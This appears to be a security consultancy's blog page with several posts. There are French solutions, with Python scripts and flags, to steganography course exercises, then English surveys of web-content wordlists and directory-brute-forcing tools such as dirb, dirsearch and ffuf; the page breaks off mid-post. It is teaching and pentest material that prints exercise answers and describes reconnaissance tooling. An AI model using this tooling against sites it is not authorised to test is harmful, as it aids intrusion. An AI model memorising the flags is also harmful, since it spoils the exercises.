SEC-IT Blog

Exercices de stéganographie

2021-03-19T14:40:00.000Z

Sommaire#

La stéganographie est le procédé de dissimulation d'un message confidentiel au sein de données. Dans le cadre d'un cours enseigné à l'ESNA, SEC-IT a proposé une série d'exercices et challenges stéganographiques dont voici les corrigés.

Nom	Points
PDF	50
Music please	50
Music please - Flag 2	50
Stats - MSE	50
Stats - PSNR	50
Purple	75
LSB Factory	100
Linked List LSB	300

La difficulté des challenges est proportionnelle au nombre de points attribués.

Challenges#

PDF#

PDF est un challenge proposant un fichier PDF. Ce dernier est une copie du PDF de présentation de L'ESNA, et possède un total de 2 pages.

En stéganographie, les fichiers PDF sont réputés leurs différentes interprétations selon les lecteurs, mais également pour la superposition des objets PDF rendant parfois invisibles certains objets comme des blocs de texte ou des images.Ces mêmes objets PDF peuvent être parfois renseignés dans la table de référence du fichier mais non affichés sur le document.

Pour ce challenge, il s'agissait d'un simple texte noir sur fond noir :

Peu de lecteurs PDF permettent la sélection d'un texte caché comme celui-ci, le lecteur proposé par Google Chrome propose toutefois de sélectionner l'ensemble du texte (CTRL+A).Il suffit ensuite de copier puis coller le contenu dans un fichier texte.

Nous nous retrouvons donc avec la chaine de caractère 92149279564403446967073413054727415165.Il s'agit d'un entier codé sur la base 10.Afin de convertir cet entier en chaine de caractère, il est possible de le convertir en binaire ou hexadecimal puis en texte, ou bien d'utiliser la commande python3 suivante :

import binascii
a = f"{92149279564403446967073413054727415165:0>4X}"  # convertion en hexa
binascii.unhexlify(a)  # ici a = "45534E417B737041414141414163657D"
# b'ESNA{spAAAAAAce}'

Une autre solution en ruby:

1 2	require 'ctf_party' # gem install ctf-party '92149279564403446967073413054727415165'.dec2hex.hex2str # => 'ESNA{spAAAAAAce}'

Flag : ESNA{spAAAAAAce}

Music please#

Pour ce challenge un fichier challenge.wav était fourni.Le fichier wav dure 31 secondes et propose le début de la musique IMANU - Memento.Les oreilles les plus affinées reconnaîtront un léger grésillement présent uniquement sur les 4 premières secondes du fichier.Ce grésillement plutôt aigu devrait être visible dans les hautes fréquences du spectre audio du fichier wav.Pour l'observer, il suffit d'ouvrir le fichier à l'aide de l'outil audacity.

Une fois le spectre affiché, celui-ci se trouver généralement sur une échelle limitée ne dépassant pas 8000 Hz.Pour afficher le spectre complet (et donc les hautes fréquences), effectuer un clic droit sur l'échelle de fréquence puis Zoom to Fit (ou Zoom Adapté sur la version française).

Le spectre est maintenant entièrement affiché.

On observe un signal transmis dans les fréquences aiguës à l'aide de signaux courts et longs.Il s'agit enfait du code Morse international, permettant de transmettre du texte à l'aide de séries d'impulsions courtes et longues.Ce même code a permis au prisonnier de guerre Jeremiah Denton de transmettre le mot torture lors d'une interview télévisée à l'aide d'une série de clignements des yeux.Ce message caché a notamment permis de passer outre la censure vietnamienne afin de confirmer pour la première fois l'utilisation de la torture sur les prisonniers américains.

. ... -. .-
.... .. -.. -.. . -.
-- --- .-. ... .
-.-. --- -.. .

Une fois décodé, le code morse devient :

1	ESNA HIDDEN MORSE CODE

FLAG : ESNA{HIDDEN MORSE CODE}

Music please - Flag 2#

Toujours sur le même fichier challenge.wav se trouvait un deuxième message caché.La musique contenue dans le fichier semble être coupée juste avant le drop de la composition originale (comme l'indique sa durée totale de 31 secondes lors de son ouverture dans un lecteur classique).La taille du fichier semble par ailleurs anormalement haute (un peu plus de 90 Megaoctets), ce qui correspond généralement à un fichier avec une forte qualité sur plusieurs minutes.Le fichier aurait donc pu être correctement altéré afin d'en limiter sa lecture.

Afin de réparer le fichier wav, il faut d'abord se renseigner sur son format de fichier :

[Bloc de déclaration d'un fichier au format WAVE]
   FileTypeBlocID  (4 octets) : Constante « RIFF »  (0x52,0x49,0x46,0x46)
   FileSize        (4 octets) : Taille du fichier moins 8 octets
   FileFormatID    (4 octets) : Format = « WAVE »  (0x57,0x41,0x56,0x45)

[Bloc décrivant le format audio]
   FormatBlocID    (4 octets) : Identifiant « fmt␣ »  (0x66,0x6D, 0x74,0x20)
   BlocSize        (4 octets) : Nombre d'octets du bloc - 16  (0x10)

   AudioFormat     (2 octets) : Format du stockage dans le fichier (1: PCM entier, 3: PCM flottant, 65534: WAVE_FORMAT_EXTENSIBLE)
   NbrCanaux       (2 octets) : Nombre de canaux (de 1 à 6, cf. ci-dessous)
   Frequence       (4 octets) : Fréquence d'échantillonnage (en hertz) [Valeurs standardisées : 11 025, 22 050, 44 100 et éventuellement 48 000 et 96 000]
   BytePerSec      (4 octets) : Nombre d'octets à lire par seconde (c.-à-d., Frequence * BytePerBloc).
   BytePerBloc     (2 octets) : Nombre d'octets par bloc d'échantillonnage (c.-à-d., tous canaux confondus : NbrCanaux * BitsPerSample/8).
   BitsPerSample   (2 octets) : Nombre de bits utilisés pour le codage de chaque échantillon (8, 16, 24)

[Bloc des données]
   DataBlocID      (4 octets) : Constante « data »  (0x64,0x61,0x74,0x61)
   DataSize        (4 octets) : Nombre d'octets des données (c.-à-d. "Data[]", c.-à-d. taille_du_fichier - taille_de_l'entête  (qui fait 44 octets normalement).
   DATAS[] : [Octets du  Sample 1 du Canal 1] [Octets du Sample 1 du Canal 2] [Octets du Sample 2 du Canal 1] [Octets du Sample 2 du Canal 2]

   * Les Canaux :
      1 pour mono,
      2 pour stéréo
      3 pour gauche, droit et centre
      4 pour face gauche, face droit, arrière gauche, arrière droit
      5 pour gauche, centre, droit, surround (ambiant)
      6 pour centre gauche, gauche, centre, centre droit, droit, surround (ambiant)

NOTES IMPORTANTES :  Les octets des mots sont stockés sous la forme Petit-boutiste (c.-à-d., en "little endian")
[87654321][16..9][24..17] [8..1][16..9][24..17] [...

Parmi l'ensemble des blocs décrivant le fichier, le bloc DataSize retient notre attention.En effet, celui-ci permet de spécifier le nombre de blocs de données audio du fichier.Si celui-ci a été volontairement décrémenté, alors une partie du fichier ne sera pas lue par les lecteurs.Le bloc DataSize est facilement identifiable puisqu'il s'agit des 4 octets suivants la constante data.

Nous pouvons dès à présent éditer notre fichier wav dans un éditeur hexadécimal comme hexedit ou encore l'éditeur hexadécimal en ligne HexEd.it.

Le contenu du bloc DataSize est donc de 28 2D B6 00.On remarque que la taille est codée dans l'orientation petit-boutiste (little endian), avec les octets de poids fort vers la fin.Nous avons donc 0x00B62D28 blocs (11939112).Nous allons incrémenter cette valeur à 0xFFB62D28 blocs (4290129192), soit la valeur 28 2D B6 FF.

Il suffit ensuite de sauvegarder le fichier et l'ouvrir de nouveau.On observe maintenant que le fichier a une durée de 3:57.

La fin de la musique se termine par une voix avec le message suivant :

1 2	Bravo, the flag is in uppercase : ESNA{IMANU_MEMENTO}. I hope you enjoyed it. If you misspelled the flag, you can verify with the music name.

Flag : ESNA{IMANU_MEMENTO}

Stats - MSE#

Pour ce challenge, un fichier cover_image.png et stego_image.png étaient fournis, avec l'énoncé suivant :

1 2	Calculer la valeur MSE pour le couple d'image suivant, tronqué 10 chiffres après la virgule. Format de flag ESNA{XX.XXXXXXXXXX}.

En ayant suivi le cours, ou en recherchant rapidement sur un moteur de recherche, on tombe sur la page Wikipédia de l'Erreur quadratique moyenne ("Mean Squared Error" en anglais).Cette mesure est généralement associée au PSNR, abordé dans le challenge suivant.

L'erreur quadratique moyenne est un estimateur statistique qui, dans le traitement d'images, permet de calculer la différence moyenne des pixels entre deux images.Elle est définie par la formule suivante :

Pour calculer cette valeur, nous utilisons python et la bibliothèque Pillow.

#!/usr/bin/env python3

# pip3 install Pillow

from PIL import Image

img1 = Image.open("cover_image.png")
img2 = Image.open("stego_image.png")

I = list(img1.getdata())
K = list(img2.getdata())

# MSE
s = []
for p in range(len(I)):  # p remplace le couple (i,j)
    s.append((I[p]-K[p])**2)  # (I(i,j) - K(i,j))²
mse = sum(s) / len(s)  # somme * 1/(m*n)

print(f"MSE: {mse}")

Nous avons en sortie : MSE: 0.49977941176470586.

Flag : ESNA{0.4997794117}

Stats - PSNR#

L'énoncé de ce challenge reprenait les deux mêmes images que le challenge précédent en demandant cette fois-ci la valeur PSNR des deux images.Le PSNR (Peak signal-to-noise ratio), est une mesure de la distorsion qui se calcule directement à partir de l'erreur moyenne quadratique (c.à.d. la valeur MSE calculée dans le précédent challenge).Le PSNR est défini de la façon suivante :

Pour résoudre le challenge, il suffit de reprendre notre script et ajouter le calcul de la formule.On notera l'import de la fonction log10 de la bibliothèque native math :

#!/usr/bin/env python3

# pip3 install Pillow

from PIL import Image
from math import log10

img1 = Image.open("cover_image.png")
img2 = Image.open("stego_image.png")

I = list(img1.getdata())
K = list(img2.getdata())

# MSE
s = []
for p in range(len(I)):  # p remplace le couple (i,j)
    s.append((I[p]-K[p])**2)  # (I(i,j) - K(i,j))²
mse = sum(s) / len(s)  # somme * 1/(m*n)

# PSNR
psnr = 10*log10((255**2)/mse)

print(f"PSNR: {psnr}")

Nous avons en sortie : PSNR: 51.14301999315866.

Flag : ESNA{51.1430199931}

Purple#

Le challenge propose un fichier challenge.bmp. La commande exiftool nous donne plus d'indication sur le format de fichier :

$ exiftool challenge.bmp
ExifTool Version Number         : 12.14
File Name                       : challenge.bmp
Directory                       : .
File Size                       : 5.3 MiB
File Modification Date/Time     : 2021:03:22 12:18:13+01:00
File Access Date/Time           : 2021:03:22 12:18:27+01:00
File Inode Change Date/Time     : 2021:03:22 12:18:26+01:00
File Permissions                : rw-r--r--
File Type                       : BMP
File Type Extension             : bmp
MIME Type                       : image/bmp
BMP Version                     : Windows V5
Image Width                     : 1440
Image Height                    : 960
Planes                          : 1
Bit Depth                       : 32
Compression                     : Bitfields
Image Length                    : 5529600
Pixels Per Meter X              : 3780
Pixels Per Meter Y              : 3780
Num Colors                      : Use BitDepth
Num Important Colors            : All
Red Mask                        : 0xf8000000
Green Mask                      : 0x07e00000
Blue Mask                       : 0x001f0000
Alpha Mask                      : 0x00000000
Color Space                     : sRGB
Rendering Intent                : Proof (LCS_GM_GRAPHICS)
Image Size                      : 1440x960
Megapixels                      : 1.4

Nous avons donc une image bitmap avec les masques suivants :

Red Mask : 0xf8000000
Green Mask : 0x07e00000
Blue Mask : 0x001f0000

En cherchant ces adresses sur internet, on se rend compte que l'image est sauvegardée avec le mode RGB565 (aussi appelé R5G6B5).Ces chiffres correspondent au nombre de bits alloués par canal (soit un total de 16 bits).Une recherche R5G6B5 BMP steganography sur internet nous mène à l'article "BMP PCM polyglot".

Note : le site était également identifiable avec la recherche "BMP 16 bits polyglot".

L'article nous explique alors qu'il est possible de créer un fichier qui soit à la fois une image BMP valide mais également un son au format raw (PCM).Pour cela, les deux fichiers sources doivent être encodés sur 16 bits (le fichier wav ainsi que le fichier bitmap) afin de générer un BMP codé sur 32 bits.L'article explique que le regroupement des fichiers vient étendre le spectre audio et placer le contenu des pixels dans le spectre inaudible.La définition du masque R5G6B5 permet alors d'indiquer la position des données d'images dans le fichier.

Afin de lire l'image, l'article suggère l'utilisation d'aplay ou audacity.Pour ce dernier, il suffit lancer l'outil et cliquer sur Fichier > Importer > Données brutes (Raw)... et sélectionner l'image.Précisez ensuite un encodage Signed 32 bits PCM, un ordre Petit boutiste, les canaux en Stereo avec un échantillonnage à 44100 Hz :

Une fois notre fichier chargé dans audacity, il est possible d'entendre une voix humaine accélérée.Pour la ralentir, sélectionnen l'audio (CTRL+A) puiss cliquez sur Effets > "Ralentir" et appliquez un ratio de 0,250.

En cliquant sur le bouton play, on entend le message suivant :

1 2	GG well play, the flag is in uppercase : ESNA{LITTLEPOLY}

Flag : ESNA{LITTLEPOLY}

LSB Factory#

Ce challenge propose un site web avec un formulaire d'upload et un timer de quelques secondes. Le site web en question nous demande d'encoder un message défini sur une image à l'aide de la technique LSB :

La technique du LSB ayant été abordé pendant le cours précédant le TP, nous invitons le lecteur à se renseigner sur cette méthode pour comprendre la suite de la correction.Afin de résoudre ce challenge, nous allons développer un script python en utilisant la bibliothèque requests pour les requêtes web et pillow pour la gestion de l'image.Un début de script était également fourni en indice, où seule la manipulation des LSB était nécessaire (seules les lignes 33 à 50 étaient manquantes).Voici le script final :

#!/usr/bin/env python3

# pip3 install requests
# pip3 install Pillow

import base64
import io
import requests
from PIL import Image

HOST = "http://51.75.16.174:8000/"

# On créé une session de navigateur
s = requests.session()

# On requète l'index pour avoir le challenge
r = s.get(HOST).text

message = r.split("")[1].split("")[0]  # Message attendu

base64_image = r.split(')[1].split('"/>')[0].replace("data:image/png;base64,","")
cover_image = Image.open(io.BytesIO(base64.b64decode(base64_image)))  # Image

cover_image.save("cover_image.png")  # On enregistre une copie local du fichier
pxs = list(cover_image.getdata())  # On récupèré la liste de pixels [(255,255,255), (255,255,255), ...]
w,h = cover_image.size  # On récupère la taille de l'image

print(f"Taille de l'image : {w}x{h}")
print(f"Message : {message}")

# TODO : Modifier la liste de pixels avec les bons LSB

# On converti le message en binaire
message_bin = ''.join([bin(ord(x))[2:].zfill(8) for x in message])

# On génère la nouvelle image
newpxs = []
x = 0
for i in range(h*w):
    r,g,b = pxs[i]
    if x < len(message_bin):
        r = r - r%2 + int(message_bin[x])
        x +=1
    if x < len(message_bin):
        g = g - g%2 + int(message_bin[x])
        x +=1
    if x < len(message_bin):
        b = b - b%2 + int(message_bin[x])
        x +=1
    newpxs.append((r,g,b))

stego_image = Image.new(cover_image.mode,cover_image.size)
stego_image.putdata(newpxs)
stego_image.save("stego_image.png")  # On enregistre une copie local du fichier

# On envoi la nouvelle image sur le serveur
r = s.post(HOST+"/upload", files={'image': open('stego_image.png','rb')}).text
print(r)  # On affiche la réponse du serveur web

De manière plus détaillée :

Ligne 17 : Première requête web afin de générer le message secret et l'image de support
Ligne 19 : Récupération du message secret dans une variable
Ligne 21-22 : Récupération de l'image au format PIL.Image
Ligne 25 : Conversion de l'image en liste de pixels
Ligne 34 : Conversion du message secret en binaire
Ligne 39-50 : Parcours des pixels et modification de la nouvelle liste de pixels en fonction du message secret
- Ligne 39 : Boucle sur l'ensemble des pixels
- Ligne 40 : Récupération du pixel courant et de ses canaux R, G, B
- Ligne 42, 45, 46: On modifie les valeurs des canaux en retirant les LSB et en ajoutant le LSB provenant du message secret
Ligne 52-54 : Génération de la nouvelle image à partir de la liste de pixels
Ligne 57 : Envoi de la nouvelle image et récupération de la réponse
Ligne 58 : Affichage de la réponse

Une fois lancé, le script nous renvoie le flag :

1
2
3

Taille de l'image : 400x400
Message : NhTK372hg6q9AJShcayXxosQhXEOwOERyH3rfJVM60Z29MfvvG
ESNA{I_made_4n_anoying_LSB_Steg0_ch4ll}

Flag : ESNA{I_made_4n_anoying_LSB_Steg0_ch4ll}

Linked List LSB#

Ce challenge était le plus difficile de l'ensemble du TP. Pour le résoudre, un papier scientifique est fourni ainsi qu'une image au format PNG.L'article scientifique propose un modèle stéganographique reposant sur la méthode LSB ainsi que sur une répartition des pixels suivant un principe de liste chainée.

Dans cette méthode, un maillon (ou bloc), est représenté par une suite de pixels successifs.La donnée stockée par le bloc (valeur secrète) est codée sur les LSB des 3 premiers pixels.L'adresse du prochain maillon (et donc, le numéro du prochain pixel), est quant à lui stocké sur les LSB restants du bloc.

Avec cette technique, la taille d'un bloc dépend de la taille nécessaire pour stocker l'adresse du prochain bloc, et dépend donc indirectement de la taille de l'image.Plus l'image est grande, plus elle a de pixels, plus l'adresse d'un pixel nécessite de bits pour être stockée et plus la taille d'un bloc sera grande.

D'une manière plus précise, la taille nécessaire pour stocker une adresse est définie de la façon suivante :

x*y le nombre de pixels
k le nombre de bits nécessaires pour stocker une adresse
k/3 le nombre de pixels nécessaires pour stocker une adresse

La première étape consistait donc à calculer la taille d'une adresse et d'un bloc pour l'image donnée.

Notre image possède une taille de 3840x2160 soit un total de 8294400 pixels. Il faut donc 2^23 bits pour stocker autant d'adresses (ici, k = 23).En répartissant ce total de 23 bits sur les couches de LSB, on obtient 7 pixels complets ainsi que 2 canaux, soit 8 pixels au total.La taille d'une adresse est donc de 8 pixels. La taille du bloc est donc de 3 pixels de données + 8 pixels d'adressage soit un total de 11 pixels par bloc.

Une fois la taille d'un bloc calculé, il faut coder une fonction d'extraction pour récupérer à la fois la valeur du secret caché dans le maillon mais également l'adresse du prochain maillon.Pour notre script, cette fonction prend donc en entrée l'adresse d'un maillon de la liste de pixels data, ajoute le secret du bloc à la variable secret_msg et retourne l'adresse du prochain bloc :

def get_data(addr):
    """ Extract byte and return next address addr. """
    global secret_msg
    s = ""
    # First, get data on 3 first pixels
    for i in range(8):
        c = data[addr+i//3][i%3]
        s += str(c%2)
    secret_msg += chr(int(s, 2))

    # Then we return next address
    r = ""
    for i in range(nb_px_addr*3):
        c = data[addr+3+i//3][i%3]
        r += str(c%2)
    return int(r, 2)

L'énoncé du challenge nous indiquant l'adresse du premier bloc (Starting pixel : 6075891), une vérification manuelle des résultats de la fonction sur ce premier bloc permet de vérifier le bon fonctionnement de la fonction.On récupère bien la lettre E et l'adresse du maillon suivant: 2732600.

Le script d'extraction final est le résultat de la fonction get_data et d'une boucle, le tout précédé par le calcul automatique de la taille du maillon:

#!/usr/bin/env python3

# pip3 install Pillow

from PIL import Image
import math

stego_image = Image.open("stego_image.png")

addr = 6075891  # start addr


# First, compute nb of pixels needed for address embeding

w,h = stego_image.size
i, n = 0, 0

while i < (w*h):
    n += 1
    i = 2**n

nb_px_addr = math.ceil(n/3)
block_size = 3+nb_px_addr

print(f"Pixels needed to embed an address: {nb_px_addr}")
print(f"Pixels per char : {block_size}")


# Decode data

secret_msg = ""
data = list(stego_image.getdata())  # Image data list
size = w*h


def get_data(addr):
    """ Extract byte and return next address addr. """
    global secret_msg
    s = ""
    # First, get data on 3 first pixels
    for i in range(8):
        c = data[addr+i//3][i%3]
        s += str(c%2)
    secret_msg += chr(int(s, 2))

    # Then we return next address
    r = ""
    for i in range(nb_px_addr*3):
        c = data[addr+3+i//3][i%3]
        r += str(c%2)
    return int(r, 2)

while True:
    addr = get_data(addr)
    print(secret_msg)

L'exécution du script nous renvoie le flag :

Flag: ESNA{L1nk3d_List_LSB_technique} - https://www.sec-it.fr/ - [end]

À propos de l'auteur#

Cet article a été écrit par Alex GARRIDO a.k.a. zeecka.Alex est pentester chez SEC-IT.

Website: zeecka.fr

Web wordlists in 2021

2021-03-02T16:50:00.000Z

Web content wordlists#

Summary#

Perimeter discovery is an important step during a web pentest and can, in some cases, lead to a website compromise. In order to carry out this recognition, several tools are available, including web content wordlists for web fuzzing:

Name	First release	Last Update	Max Size (lines)
SecLists	2012/02/20	2021/02/12	1.273.833 (directory-list-2.3-big.txt)
Assetnote wordlists	2020/11/16	2021/01/28	4.319.406 (httparchive_js_2020_11_18.txt)
Dirb wordlists	2015/06/16	2015/06/16	20.469 (big.txt)
DirBuster wordlists	2013/05/01	2013/05/01	220.560 (directory-list-2.3-medium.txt)
Dirsearch dicc.txt	2013/05/22	2021/02/10	9.021 (dicc.txt)
Wfuzz wordlists	2014/10/23	2019/03/14	45.459 (megabeast.txt)
Wordlistctl (Bonus)	2018/10/28	2018/11/02	N/A

* this post has been written in Feb. 2021

Note that this post only includes routes, files and folder wordlists. Therefore, wordlists which include passwords such as rockyou.txt will not be covered.

SecLists#

SecLists is a collection of multiple types of wordlists, including usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

SecLists is the security tester's companion. [...] The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.

The repository is actively maintained and its last commit is less than two weeks ago. The package is provided by most of pentesting Linux releases such as Black Arch and Kali Linux.

Covered wordlists are located into Discovery/Web-Content/. We can notice that there is a lot of available wordlists (121 in the main folder). Some of them are specific for a given technology (CGIs.txt, coldfusion.txt, oracle.txt ...), others are specific for a given language (common-and-french.txt, common-and-dutch.txt ...). The main wordlist family present in SecList is the "RAFT Word Lists".

RAFT wordlists has been generated from robots.txt from 1.7 million websites and were originally provided by RAFT Tool in 2011. In this family, wordlists are separated as follows :

4 families (directories, extensions, files and words)
3 sizes per family (large, medium and small)
2 case options (normal and lowercase)

Name	Size (lines) large	Size (lines) medium	Size (lines) small
raft-*-directories.txt	62.283	30.000	20.116
raft-*-directories-lowercase.txt	56.163	26.584	17.770
raft-*-files.txt	37.042	17.128	11.424
raft-*-files-lowercase.txt	35.324	16.243	10.848
raft-*-extensions.txt	2.449	1.289	963
raft-*-extensions-lowercase.txt	2.366	1.233	914
raft-*-words.txt	119.600	63.087	43.003
raft-*-words-lowercase.txt	107.982	56.293	38.267

Looking at raft-*-files.txt, we got the following extension repartition :

Histogram	Pie chart

SecLists also includes wordlists provided with dirbuster and dirb, covered in the rest of this post.

Assetnote wordlists#

Assetnote is a company that provides security tools and services to measure exposure to external attack. The company also provides a repository named Assetnote Wordlist.

Theses wordlists are generated monthly using Google BigQuery datasets with their GO client named commonspeak2, and results in content discovery and subdomain wordlists.

As these datasets are updated on a regular basis, the wordlists generated via Commonspeak2 reflect the current technologies used on the web.

Wordlists are generated per technologies, for this post we will focus on directories, API routes and PHP, ASP.NET, JSP/JSPA languages.

Note : As January 2021 wordlists seems less complete than previous wordlists, and February 2021 wordlists not available at this time, we will focus in November 2020 wordlists.

Name	Technologie	Size (lines)
httparchive_directories_1m_2020_11_18.txt	Directories	1.000.000
httparchive_apiroutes_2020_11_20.txt	API routes	953.011
httparchive_php_2020_11_18.txt	PHP	74.887
httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt	ASP .NET	63.200
httparchive_jsp_jspa_do_action_2020_11_18.txt	JSP	10.506

Assetnote Directories	Assetnote API routes

Note: /, - and _ are considered as a wildcard in the previous graph.

Dirb wordlists#

Dirb is a web discovery tool already covered in a previous post. The tool is provided with multiple wordlists including more common ones:

Name	Size (lines)
common.txt (default wordlist for dirb)	4.614
big.txt	20.469
small.txt	959

Charsets in dirb family.

Those wordlist doesn't have any extensions and only 2% of the words contain capital letters. You can also note that there is more "other" charsets in common.txt than in big.txt.

DirBuster wordlists#

DirBuster is a web discovery tool that has also been covered in a previous post. The tool is provided with multiple wordlists including directory-list-2.3 wordlists family.

Name	Size (lines)
directory-list-2.3-big.txt	1.273.833
directory-list-2.3-medium.txt	220.560
directory-list-2.3-small.txt	87.664

Some packaged versions may not include directory-list-2.3-big.txt.

Such as dirb wordlists, directory-list-2.3 doesn't include any extensions.

Charsets in directory-list-2.3 family.

Note: /, - and _ are considered as a wildcard in the previous graph.

Dirsearch dicc.txt#

dicc.txt is a wordlist provided with dirsearch tool. The wordlist has the particularity to provide the variable extension %EXT%. Therefore, the wordlist must be used with tools that support %EXT% format (see post about web discovery tools).The wordlist has a total of 9021 lines distributed as follows :

dicc.txt

You can note that there is "only" 500 words containing %EXT% extension.

Wfuzz wordlists#

Wfuzz tool is provided with a lot of wordlists. Some of them in "general" directory are dedicated for directories and files enumeration. That's the case of megabeast.txt, big.txt, medium.txt and common.txt. None of those wordlist have words containing extensions. They are distributed as follows :

Charsets in wfuzz family.

Wordlistctl (Bonus)#

In some case, an auditor may look for a specific wordlist. Wordlistctl is a tool design to fetch, install, update and search for a given wordlists. This python script offers more than 6400 wordlists and is maintained by BlackArch Linux distribution.

$ wordlistctl search wordpress

--==[ wordlistctl by blackarch.org ]==--

    > wordpress (29.20 Kb)
    > urls-wordpress-3 (36.62 Kb)
    > wordpress-attacks-july2014 (88.00 B)
    > wordpress_usernames (541.57 Mb)
    > wordpress_attacks_july2014 (88 B)

$ wordlistctl fetch -l urls-wordpress-3
--==[ wordlistctl by blackarch.org ]==--

[*] downloading urls-wordpress-3.3.1.txt to /usr/share/wordlists/discovery/urls-wordpress-3.3.1.txt.part
[+] downloading urls-wordpress-3.3.1.txt completed

Security.txt (Bonus)#

Intro#

I (Alexandre ZANNI a.k.a. noraj) am adding a little bonus section aboutsecurity.txt in web wordlistson Alex GARRIDO (a.k.a. zeecka) article.

In 2020, I wrote an article about security.txt on TurgenSec blog:Security.txt | Progress in Ethical Security Research.

I invite you to read the article to understand what is security.txt, what it isused for, and how widely adopted it has become.

Here we are only going to get an idea of how widely security.txt isincluded in security wordlist.

Stats#

SecLists#

There are only 3 lists used for Web content discovery in SecLists that are actually includingat least one variant of the security.txt file among the 233.

$ grep -rnE '^security.txt|.well-known/security.txt' /usr/share/seclists/Discovery/Web-Content
/usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt:15772:security.txt
/usr/share/seclists/Discovery/Web-Content/common.txt:87:.well-known/security.txt
/usr/share/seclists/Discovery/Web-Content/dirsearch.txt:933:.well-known/security.txt

$ find /usr/share/seclists/Discovery/Web-Content -type f | wc -l
233

We can conclude that only 1,3% of Web content discovery in SecLists are includingsecurity.txt.

But SVNDigger/all.txt is only including security.txt while common.txt anddirsearch.txt are only including .well-known/security.txt. So zero listis including the 2 variants.

Assetnote Wordlists#

The Assetnote Wordlists are cut under 3 categories:

automated
manual
technologies

We'll exclude technologies from the stats since it's focusing on specificproducts.

There are only 3 lists used for Web content discovery in Assetnote Wordliststhat are actually includingat least one variant of the security.txt file among the 77 generic wordlists.

$ grep -rnE '^security.txt|.well-known/security.txt' /tmp/assetnote-wordlists/{automated,manual}
/tmp/assetnote-wordlists/automated/httparchive_txt_2021_02_28.txt:623:security.txt
/tmp/assetnote-wordlists/automated/httparchive_txt_2021_01_28.txt:701:security.txt
/tmp/assetnote-wordlists/automated/httparchive_txt_2020_11_18.txt:366:security.txt

$ find /tmp/assetnote-wordlists/{automated,manual} -type f | wc -l
77

We can conclude that only 3,8% of Web content discovery in Assetnote Wordlistsare including security.txt.

But all the three are only including security.txt and do not include thestandard path .well-known/security.txt.

Conclusion#

If you are trying to find security.txt files, you should build your customwordlists including the two following entries as most of the generic wordlistsdon't include them.

1 2	security.txt .well-known/security.txt

An alternative would be to run the common wordlists you are used to fuzz withand build only an additional wordlist including only files like security.txtor other files that may be missing from most wordlists so you don't have toupdate the generic part on your own.

Comparative table#

Without further ado, here is a comparative table of the different wordlists discussed in this post. Colored cases represent a high correlation between wordlists. To understand the matrix you should read: "N% of the wordlist at line Y is contained in wordlist at column X".

I.E.: 87% of wordlist n°17 (dirb - small) is contained in wordlist n°0 (seclists - raft-large-files).

The sources used to generate this chart are available on this repository:sec-it/WL-Comparison.

An interactive version of the chart is available online.

About the author#

This piece was written by Alex GARRIDO a.k.a. zeecka.Alex is a pentester at SEC-IT.

Website: zeecka.fr

Web content enumeration tools in 2021

2021-02-16T18:09:00.000Z

Web content enumeration tools#

Summary#

Name	Version*	First release	Last Release	Language
Dirb	2.22	2005/04/27	2014/11/19	C
DirBuster	1.0-RC1	2007	2013/05/01	Java
Dirsearch	0.4.1	2014/07/07	2020/12/08	Python3
FFUF	1.2.1	2018/11/08	2021/01/24	Go
Gobuster	3.1.0	2015/07/21	2020/10/19	Go
Wfuzz	3.1.0	2014/10/23	2020/11/06	Python3
BFAC (Bonus)	1.0	2017/11/08	2017/11/08	Python3

* this post has been written in Feb. 2021

Other tools such as Rustbuster, FinalRecon or Monsoon exists and won't be fully described since they're less known and used. They'll be part of the synthesis.

Dirb#

Dirb is a web content scanner written in C and provided by The Dark Raver since 2005.

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.

The last release of this tool was 5 years ago, in 2014, with the version 2.22. The package is provided by most of pentesting Linux releases such as Black Arch and Kali Linux.

The tool is provided with many wordlists, including big.txt, and common.txt (its default wordlist). Dirb is also provided with two utilities: html2dic which is an equivalent of cewl and gendict which is an equivalent of crunch, both are used for wordlist generation.

Despite dirb is one of the oldest web discovery tools, it proposes most of the advanced options such as custom headers, custom extensions, authenticated proxy and even interactive recursion. Unfortunately, the tool is one of the rarest that doesn't provide multithreaded capabilities.

Pros#

Specify multiple wordlists (comma separated)
Recursive mode (by default, or using -R option for interactive mode)

Cons#

No multithreaded option
Only GET method
No fancy filters
Only one output options

DirBuster#

DirBuster is a web content scanner written in Java provided the OWASP Foundation since 2007. The project is no longer maintained by OWASP and the provided features are now part of the OWASP ZAP Proxy. The last release of the tools was version 1.0-RC1 in 2008. DirBuster has the particularity to provide a GUI :

Even if the project is not proposed by OWASP anymore, source of the tool can be found on SourceForge. The tool is also provided by most of pentesting Linux distributions.

The tool is packaged with 8 wordlists including directory-list-1.0.txt and apache-user-enum-2.0.txt.

Pros#

WebSite scrapping (extract folders from src and href attributes)
Support digest access authentication
Specify Fuzzing point in URL
Reports in XML, CSV or TXT

Cons#

Only GET/HEAD method
Java GUI

Dirsearch#

Dirsearch is a command-line tool designed to brute force directories and files in web servers. The tool is written in Python3 since 2015 but was designed in 2014 with Python2. Dirsearch is still maintained and the last release was in December 2020.

As a feature-rich tool, dirsearch gives users the opportunity to perform a complex web content discovering, with many vectors for the wordlist, high accuracy, impressive performance, advanced connection/request settings, modern brute-force techniques and nice output.

As you can see, dirsearch provides many options to perform wordlist transformation such as extension exclusion, suffix, extension removal. Dirsearch even provide 429 - Too Many Requests error handling, raw requests handling, and regex checks. Dirsearch is provided with a default wordlist named dicc.txt which contain %EXT% tags which will be replaced with user-defined extensions.

Finally, dirsearch provide multiple report formats including text, JSON, XML, Markdown and CSV.

Pros#

Multiple URLs and CIDR support
Multiple extensions check
Support multiple wordlists with wordlist manipulation
Support raw requests with --raw option, and any HTTP method with -m.
Colorful output with many export formats and regex filters

Cons#

Lots of options, custom scan may be long to configure
No quick way to fuzz a specific part of an URL

FFUF#

FFUF (Fuzz Faster U Fool) is a web fuzzer written in Go. The tool is quite recent (first release in 2018) and is actively updated. Unlike the previous tools, FFUF aims to be an HTTP fuzzing tool which can be used not only for content discovery but also for parameters fuzzing. Thanks to its design, FFUF also has the ability to fuzz headers such as VHOST.

Such as Dirsearch, FFUF provide filter and "matcher" options (including regex) to sort results, and a lot of output formats (including JSON and XML). FFUF is the only one to provide multi-wordlist operation mode, such as attack type in BurpSuite intruder. This mode can be used for bruteforce attack or complex fuzzing discovery.

